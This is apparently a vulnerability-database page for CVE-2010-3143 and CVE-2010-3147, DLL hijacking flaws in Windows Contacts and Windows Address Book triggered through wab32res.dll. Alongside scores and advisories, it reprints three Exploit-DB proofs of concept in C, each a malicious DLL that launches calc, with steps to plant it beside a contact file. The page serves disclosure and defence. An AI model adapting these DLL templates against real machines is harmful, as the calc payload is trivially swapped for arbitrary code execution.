CVE-2010-3143
published 2010-08-27CVE-2010-3143: Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL…
PriorityP353critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
20.77%
97.2th percentile
Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wab32res.dll that is located in the same folder as a .contact, .group, .p7c, .vcf, or .wab file. NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3147.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | outlook_express | — | — |
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3xpx-f47r-jph5: Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and con
ghsa_unreviewed·2022-05-17·CVSS 9.3
CVE-2010-3143 [CRITICAL] GHSA-3xpx-f47r-jph5: Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and con
Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wab32res.dll that is located in the same folder as a .contact, .group, .p7c, .vcf, or .wab file. NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3147.
GHSA
GHSA-r3qf-2852-p8j8: Untrusted search path vulnerability in wab
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2010-3147 [CRITICAL] GHSA-r3qf-2852-p8j8: Untrusted search path vulnerability in wab
Untrusted search path vulnerability in wab.exe 6.00.2900.5512 in Windows Address Book in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a Trojan horse wab32res.dll file in the current working directory, as demonstrated by a directory that contains a Windows Address Book (WAB), VCF (aka vCard), or P7C file, aka "Insecure Library Loading Vulnerability." NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3143.
Red Hat
python: rgbimg: multiple security issues
vendor_redhat·2010-05-10·CVSS 7.5
CVE-2010-1449 [HIGH] python: rgbimg: multiple security issues
python: rgbimg: multiple security issues
Integer overflow in rgbimgmodule.c in the rgbimg module in Python 2.5 allows remote attackers to have an unspecified impact via a large image that triggers a buffer overflow. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-3143.12.
Statement: The Red Hat Security Response Team has rated this issue as having low security
impact, a future update may address this flaw.
Red Hat
python: audioop: incorrect integer overflow checks
vendor_redhat·2010-05-10·CVSS 7.5
CVE-2010-1634 [HIGH] CWE-190 python: audioop: incorrect integer overflow checks
python: audioop: incorrect integer overflow checks
Multiple integer overflows in audioop.c in the audioop module in Python 2.6, 2.7, 3.1, and 3.2 allow context-dependent attackers to cause a denial of service (application crash) via a large fragment, as demonstrated by a call to audioop.lin2lin with a long string in the first argument, leading to a buffer overflow. NOTE: this vulnerability exists because of an incorrect fix for CVE-2008-3143.5.
Package: python (Red Hat Enterprise Linux Extended Update Support 6.0) - Affected
No detection rules found.
Exploit-DB
Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking
exploitdb·2010-08-25
CVE-2010-3147 Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking
Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking
---
/*
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora , Anirban , Dinesh Arora
# Site : www.beenuarora.com
Exploit Title: Microsoft Address Book DLL Hijacking
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 , Microsoft Address Book 6.00.2900.5512
Vulnerable extensions: wab , p7c
Compile and rename to wab32res.dll, create a file in the same dir with one
of the following extensions:
.wab,p7c
*/
#include
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void hook_startup() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14745.zip
Exploit-DB
Microsoft Windows - Contacts 'wab32res.dll' DLL Hijacking
exploitdb·2010-08-25
CVE-2010-3147 Microsoft Windows - Contacts 'wab32res.dll' DLL Hijacking
Microsoft Windows - Contacts 'wab32res.dll' DLL Hijacking
---
/*
Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
Date: August 25, 2010
Author: storm ([email protected])
Tested on: Windows Vista SP2
http://www.gonullyourself.org/
gcc -shared -o wab32res.dll Contacts-DLL.c
.contact, .group, .p7c, .vcf, and .wab files are affected.
*/
#include
int hax()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
hax();
return 0;
}
Exploit-DB
Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking
exploitdb·2010-08-24
CVE-2010-3147 Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking
Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking
---
/*
Exploit Title: Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll)
Date: 24/08/2010
Author: TheLeader
Email: gsog2009 [a7] hotmail [d0t] com
Version: 6.1.7600 and prior
Tested on: Windows 7 x86 (6.1.7600)
There's a chance this one works with vista.
Instructions:
Compile and rename to wab32res.dll, create a file in the same dir with one of the following extensions:
.vcf / .p7c / .group / .contact
Double click & watch a sexy calculator pop =X
*Random noises* to all the great guys at forums.hacking.org.il
*/
#include
#define DLLIMPORT __declspec (dllexport)
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
evil();
return 0;
}
No writeups or analysis indexed.
http://www.exploit-db.com/exploits/14778/https://exchange.xforce.ibmcloud.com/vulnerabilities/64446https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7224http://www.exploit-db.com/exploits/14778/https://exchange.xforce.ibmcloud.com/vulnerabilities/64446https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7224
2010-08-27
Published